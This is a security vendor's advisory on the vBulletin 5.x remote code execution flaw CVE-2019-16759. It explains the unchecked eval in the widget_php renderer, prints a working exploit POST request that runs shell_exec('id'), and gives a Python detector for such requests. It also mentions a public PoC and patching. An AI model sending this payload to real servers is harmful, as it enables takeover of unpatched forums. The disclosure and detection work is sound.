Tens of Thousands of vBulletin Forums Wildly Being Exploited (CVE-2019-16759)

Sep 26, 2019 | By Shakeel Bhat | 3 min read

A critical remote code execution (RCE) vulnerability affecting vBulletin, one of the most widely used internet forum software packages, has been publicly disclosed. The vBulletin vulnerability is tracked as CVE-2019-16759. It allows an attacker to execute any command on the website, such as uploading malware, uploading web shells, or tampering with the website's code. Researchers and attackers have known about, used, and sold this vulnerability for years. A good vulnerability management tool can solve these problems.

Technical Details of the vBulletin Vulnerability:

The vulnerability resides in how vBulletin's PHP widget file accepts its configuration via URL parameters and parses it on the server without proper safety checks. vBulletin's PHP widgets are rendered at run-time and are used to create dynamic widgets without accessing the hosting server directly. Vulnerability management software can resolve these issues. An attacker can force the website to render arbitrary widgets using the ajax/render/widget_php route and thereby execute arbitrary code. Below are the contents of the file ajax/render/widget_php.

```html
<div class="widget-content">
    <vb:if condition="!empty($widgetConfig['code']) AND !$vboptions['disable_php_rendering']">
        {vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}}
        {vb:raw $evaledPHP}
    <vb:else />
        <vb:if condition="$user['can_use_sitebuilder']">
            <span class="note">{vb:phrase click_edit_to_config_module}</span>
        </vb:if>
    </vb:if>
</div>
```

A callback to the evalCode function from the above template executes whatever PHP is passed in the $code argument. This can be used to run any command available on the system, open firewall ports, or download and execute files and scripts. The function evalCode is present in includes/vb5/frontend/controller/bbcode.php.

```php
<?php
// Found in: public_html/includes/vb5/frontend/controller/bbcode.php
function evalCode($code)
{
    ob_start();
    // The widget code arrives here unchecked and is evaluated as PHP
    eval($code);
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}
```

A typical POST request executing the ‘id’ command on a vulnerable vBulletin could be:

```http
POST / HTTP/1.1
Host: 192.168.1.12
Content-Length: 108
Content-Type: application/x-www-form-urlencoded

routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27id%27%29%3B+exit%3B
```

Upon receiving this request, the server forwards the "id" command to the evalCode function and returns its output to the client. Manipulating the widgetConfig argument supplied as a request parameter thus leads directly to command execution.
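The request pattern above (a form body routing to ajax/render/widget_php that carries a widgetConfig[code] parameter) is what a defender would look for in web logs or request captures. The following detector is an added example, not SecPod's or vBulletin's code; the sample requests are constructed to mirror the one shown above, and the function names are hypothetical.

```python
"""Flag CVE-2019-16759 exploitation attempts in raw HTTP POST requests.

Hypothetical detection helper (not SecPod's or vBulletin's code). It flags
requests whose form body routes to ajax/render/widget_php and carries a
widgetConfig[code] parameter, the combination that reaches evalCode().
"""
from urllib.parse import parse_qs

VULN_ROUTE = "ajax/render/widget_php"
CODE_PARAM = "widgetConfig[code]"


def parse_request(raw: str) -> tuple[str, dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (request line, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def is_widget_php_exploit(raw: str) -> tuple[bool, str]:
    """Return (flagged, reason). Only form-encoded bodies are inspected."""
    _, headers, body = parse_request(raw)
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return False, "not a form-encoded body"
    # parse_qs percent-decodes keys and values, so %2F and %5B/%5D are resolved here
    params = parse_qs(body, keep_blank_values=True)
    route = params.get("routestring", [""])[0].lstrip("/").lower()
    if route != VULN_ROUTE:
        return False, f"route {route!r} is not the widget_php renderer"
    code = params.get(CODE_PARAM, [""])[0]
    if not code:
        return False, "widget_php render without a widgetConfig[code] payload"
    return True, f"widget_php render with injected PHP: {code[:60]!r}"


# Constructed samples modelled on the request above; not captured traffic.
SAMPLE_EXPLOIT = (
    "POST / HTTP/1.1\r\nHost: 192.168.1.12\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D="
    "echo+shell_exec%28%27id%27%29%3B+exit%3B"
)
SAMPLE_BENIGN = (
    "POST / HTTP/1.1\r\nHost: 192.168.1.12\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Btitle%5D=Latest"
)

if __name__ == "__main__":
    for sample in (SAMPLE_EXPLOIT, SAMPLE_BENIGN):
        print(is_widget_php_exploit(sample))
```

Because parse_qs decodes the body before matching, the check is not fooled by the percent-encoded slashes and brackets in the original request; a production rule should also cover query-string delivery of the same parameters.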

Publicly available PoC:

Proof-of-concept code is publicly available for this vulnerability. Since the release of the PoC, this vulnerability has been widely exploited, and many users have reported attacks on their forums using it. A botnet is also using this disclosed vBulletin exploit to lock down vulnerable servers so that they cannot be used by other attackers: the botnet breaks into a vulnerable server with the exploit and then modifies the evalCode function in the source code file so that it requires a password before executing commands.

Thousands of websites use this forum software, including those of organizations such as Pearl Jam, NASA, EA, STEAM, the Houston Texans, Sony Pictures, Zynga, and more.

Affected vBulletin Versions:

All vBulletin forum versions 5.x through 5.5.4.

Impact of the vBulletin Vulnerability:

This vulnerability allows an attacker to execute arbitrary code on the affected system.

Solution:

An official patch is available for this vBulletin vulnerability. Apply the latest security patches, which are available for download from the vendor.
